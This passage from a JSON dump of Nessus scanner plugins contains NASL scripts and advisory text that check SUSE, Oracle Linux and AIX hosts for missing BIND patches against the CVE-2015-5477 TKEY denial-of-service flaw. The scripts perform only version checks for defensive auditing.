script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED11|SLES11)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED11 / SLES11\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES11\" && (! preg(pattern:\"^(2|3|4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES11 SP2/3/4\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED11\" && (! 
preg(pattern:\"^(3|4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED11 SP3/4\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"x86_64\", reference:\"bind-libs-32bit-9.9.6P1-0.12.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"s390x\", reference:\"bind-libs-32bit-9.9.6P1-0.12.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"bind-9.9.6P1-0.12.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"bind-chrootenv-9.9.6P1-0.12.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"bind-doc-9.9.6P1-0.12.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"bind-libs-9.9.6P1-0.12.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"bind-utils-9.9.6P1-0.12.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"x86_64\", reference:\"bind-libs-32bit-9.9.6P1-0.12.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"s390x\", reference:\"bind-libs-32bit-9.9.6P1-0.12.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"bind-9.9.6P1-0.12.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"bind-chrootenv-9.9.6P1-0.12.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"bind-doc-9.9.6P1-0.12.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"bind-libs-9.9.6P1-0.12.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"bind-utils-9.9.6P1-0.12.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", cpu:\"x86_64\", reference:\"bind-libs-32bit-9.9.6P1-0.12.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", cpu:\"s390x\", reference:\"bind-libs-32bit-9.9.6P1-0.12.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"bind-9.9.6P1-0.12.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"bind-chrootenv-9.9.6P1-0.12.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", 
reference:\"bind-devel-9.9.6P1-0.12.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"bind-doc-9.9.6P1-0.12.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"bind-libs-9.9.6P1-0.12.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"bind-utils-9.9.6P1-0.12.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"x86_64\", reference:\"bind-libs-9.9.6P1-0.12.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"x86_64\", reference:\"bind-utils-9.9.6P1-0.12.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"x86_64\", reference:\"bind-libs-32bit-9.9.6P1-0.12.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"i586\", reference:\"bind-libs-9.9.6P1-0.12.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"i586\", reference:\"bind-utils-9.9.6P1-0.12.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"x86_64\", reference:\"bind-libs-9.9.6P1-0.12.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"x86_64\", reference:\"bind-utils-9.9.6P1-0.12.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"x86_64\", reference:\"bind-libs-32bit-9.9.6P1-0.12.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"i586\", reference:\"bind-libs-9.9.6P1-0.12.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"i586\", reference:\"bind-utils-9.9.6P1-0.12.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bind\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-03-27T15:04:55", "description": "From Red Hat Security Advisory 2015:1515 :\n\nUpdated bind97 packages that fix one security issue are now available for Red Hat Enterprise Linux 5.\n\nRed 
Hat Product Security has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe Berkeley Internet Name Domain (BIND) is an implementation of the Domain Name System (DNS) protocols. BIND includes a DNS server (named); a resolver library (routines for applications to use when interfacing with DNS); and tools for verifying that the DNS server is operating correctly.\n\nA flaw was found in the way BIND handled requests for TKEY DNS resource records. A remote attacker could use this flaw to make named (functioning as an authoritative DNS server or a DNS resolver) exit unexpectedly with an assertion failure via a specially crafted DNS request packet. (CVE-2015-5477)\n\nRed Hat would like to thank ISC for reporting this issue. Upstream acknowledges Jonathan Foote as the original reporter.\n\nAll bind97 users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue. 
After installing the update, the BIND daemon (named) will be restarted automatically.", "cvss3": {"score": null, "vector": null}, "published": "2015-07-30T00:00:00", "type": "nessus", "title": "Oracle Linux 5 : bind97 (ELSA-2015-1515)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:bind97", "p-cpe:/a:oracle:linux:bind97-chroot", "p-cpe:/a:oracle:linux:bind97-devel", "p-cpe:/a:oracle:linux:bind97-libs", "p-cpe:/a:oracle:linux:bind97-utils", "cpe:/o:oracle:linux:5"], "id": "ORACLELINUX_ELSA-2015-1515.NASL", "href": "https://www.tenable.com/plugins/nessus/85117", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2015:1515 and \n# Oracle Linux Security Advisory ELSA-2015-1515 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(85117);\n script_version(\"2.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2015-5477\");\n script_xref(name:\"RHSA\", value:\"2015:1515\");\n\n script_name(english:\"Oracle Linux 5 : bind97 (ELSA-2015-1515)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2015:1515 :\n\nUpdated bind97 packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. 
A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe Berkeley Internet Name Domain (BIND) is an implementation of the\nDomain Name System (DNS) protocols. BIND includes a DNS server\n(named); a resolver library (routines for applications to use when\ninterfacing with DNS); and tools for verifying that the DNS server is\noperating correctly.\n\nA flaw was found in the way BIND handled requests for TKEY DNS\nresource records. A remote attacker could use this flaw to make named\n(functioning as an authoritative DNS server or a DNS resolver) exit\nunexpectedly with an assertion failure via a specially crafted DNS\nrequest packet. (CVE-2015-5477)\n\nRed Hat would like to thank ISC for reporting this issue. Upstream\nacknowledges Jonathan Foote as the original reporter.\n\nAll bind97 users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue. 
After\ninstalling the update, the BIND daemon (named) will be restarted\nautomatically.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2015-July/005225.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected bind97 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bind97\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bind97-chroot\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bind97-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bind97-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bind97-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/07/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/30\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL5\", reference:\"bind97-9.7.0-21.P2.el5_11.2\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"bind97-chroot-9.7.0-21.P2.el5_11.2\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"bind97-devel-9.7.0-21.P2.el5_11.2\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"bind97-libs-9.7.0-21.P2.el5_11.2\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"bind97-utils-9.7.0-21.P2.el5_11.2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = 
pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bind97 / bind97-chroot / bind97-devel / bind97-libs / bind97-utils\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-03-27T15:06:14", "description": "ISC BIND is vulnerable to a denial of service, caused by an error in the handling of TKEY queries. By sending specially-crafted packets, a remote attacker could exploit this vulnerability to cause a REQUIRE assertion failure.", "cvss3": {"score": null, "vector": null}, "published": "2015-08-17T00:00:00", "type": "nessus", "title": "AIX 6.1 TL 8 : bind9 (IV75694)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2021-01-04T00:00:00", "cpe": ["cpe:/o:ibm:aix:6.1"], "id": "AIX_IV75694.NASL", "href": "https://www.tenable.com/plugins/nessus/85417", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text in the description was extracted from AIX Security\n# Advisory bind9_advisory8.asc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(85417);\n script_version(\"2.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2015-5477\");\n\n script_name(english:\"AIX 6.1 TL 8 : bind9 (IV75694)\");\n script_summary(english:\"Check for APAR IV75694\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote AIX host is missing a security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"ISC BIND is vulnerable to a denial of service, caused by an error in\nthe handling of TKEY queries. 
By sending specially-crafted packets, a\nremote attacker could exploit this vulnerability to cause a REQUIRE\nassertion failure.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://aix.software.ibm.com/aix/efixes/security/bind9_advisory8.asc\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install the appropriate interim fix.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:ibm:aix:6.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/08/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/08/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/08/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"AIX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/AIX/lslpp\", \"Host/local_checks_enabled\", \"Host/AIX/version\");\n\n exit(0);\n}\n\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"aix.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif ( ! get_kb_item(\"Host/AIX/version\") ) audit(AUDIT_OS_NOT, \"AIX\");\nif ( ! 
get_kb_item(\"Host/AIX/lslpp\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif ( get_kb_item(\"Host/AIX/emgr_failure\" ) ) exit(0, \"This iFix check is disabled because : \"+get_kb_item(\"Host/AIX/emgr_failure\") );\n\nflag = 0;\n\nif (aix_check_ifix(release:\"6.1\", ml:\"08\", sp:\"06\", patch:\"IV75694s6a\", package:\"bos.net.tcp.client\", minfilesetver:\"6.1.0.0\", maxfilesetver:\"6.1.8.19\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:aix_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-03-27T15:06:15", "description": "ISC BIND is vulnerable to a denial of service, caused by an error in the handling of TKEY queries. By sending specially-crafted packets, a remote attacker could exploit this vulnerability to cause a REQUIRE assertion failure.", "cvss3": {"score": null, "vector": null}, "published": "2015-08-17T00:00:00", "type": "nessus", "title": "AIX 7.1 TL 3 : bind9 (IV75693)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2021-01-04T00:00:00", "cpe": ["cpe:/o:ibm:aix:7.1"], "id": "AIX_IV75693.NASL", "href": "https://www.tenable.com/plugins/nessus/85416", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text in the description was extracted from AIX Security\n# Advisory bind9_advisory8.asc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(85416);\n script_version(\"2.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2015-5477\");\n\n script_name(english:\"AIX 7.1 TL 3 : bind9 (IV75693)\");\n script_summary(english:\"Check for APAR IV75693\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote AIX host is missing a security patch.\"\n );\n script_set_attribute(\n 
attribute:\"description\", \n value:\n\"ISC BIND is vulnerable to a denial of service, caused by an error in\nthe handling of TKEY queries. By sending specially-crafted packets, a\nremote attacker could exploit this vulnerability to cause a REQUIRE\nassertion failure.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://aix.software.ibm.com/aix/efixes/security/bind9_advisory8.asc\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install the appropriate interim fix.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:ibm:aix:7.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/08/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/08/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/08/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"AIX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/AIX/lslpp\", \"Host/local_checks_enabled\", \"Host/AIX/version\");\n\n exit(0);\n}\n\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"aix.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif ( ! get_kb_item(\"Host/AIX/version\") ) audit(AUDIT_OS_NOT, \"AIX\");\nif ( ! 
get_kb_item(\"Host/AIX/lslpp\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif ( get_kb_item(\"Host/AIX/emgr_failure\" ) ) exit(0, \"This iFix check is disabled because : \"+get_kb_item(\"Host/AIX/emgr_failure\") );\n\nflag = 0;\n\nif (aix_check_ifix(release:\"7.1\", ml:\"03\", sp:\"05\", patch:\"(IV75693s5a|IV78095m5a)\", package:\"bos.net.tcp.client\", minfilesetver:\"7.1.0.0\", maxfilesetver:\"7.1.3.45\") < 0) flag++;\n\nif (flag)\n{\n aix_report_extra = ereg_replace(string:aix_report_get(), pattern:\"[()]\", replace:\"\");\n aix_report_extra = ereg_replace(string:aix_report_extra, pattern:\"[|]\", replace:\" or \");\n if (report_verbosity > 0) security_hole(port:0, extra:aix_report_extra);\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-03-27T15:06:22", "description": "bind was updated to fix one security issue :\n\nCVE-2015-5477: Remote Denial-of-Service via TKEY queries. (bsc#939567)\n\nExposure to this issue can not be prevented by either ACLs or configuration options limiting or denying service because the exploitable code occurs early in the packet handling.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2015-08-03T00:00:00", "type": "nessus", "title": "SUSE SLES10 Security Update : bind (SUSE-SU-2015:1322-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:bind", "p-cpe:/a:novell:suse_linux:bind-chrootenv", "p-cpe:/a:novell:suse_linux:bind-devel", "p-cpe:/a:novell:suse_linux:bind-doc", "p-cpe:/a:novell:suse_linux:bind-libs", "p-cpe:/a:novell:suse_linux:bind-utils", "cpe:/o:novell:suse_linux:10"], "id": "SUSE_SU-2015-1322-1.NASL", "href": "https://www.tenable.com/plugins/nessus/85179", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2015:1322-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(85179);\n script_version(\"2.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2015-5477\");\n\n script_name(english:\"SUSE SLES10 Security Update : bind (SUSE-SU-2015:1322-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"bind was updated to fix one security issue :\n\nCVE-2015-5477: Remote Denial-of-Service via TKEY queries. 
(bsc#939567)\n\nExposure to this issue can not be prevented by either ACLs or\nconfiguration options limiting or denying service because the\nexploitable code occurs early in the packet handling.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=939567\"\n );\n # https://download.suse.com/patch/finder/?keywords=fe704ff20633640972645403977f8036\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?eb419a45\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-5477/\"\n );\n # https://www.suse.com/support/update/announcement/2015/suse-su-20151322-1.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?915b47dd\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected bind packages\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:bind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:bind-chrootenv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:bind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:bind-doc\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:suse_linux:bind-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:bind-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/07/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/08/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES10)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES10\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES10\" && (! 
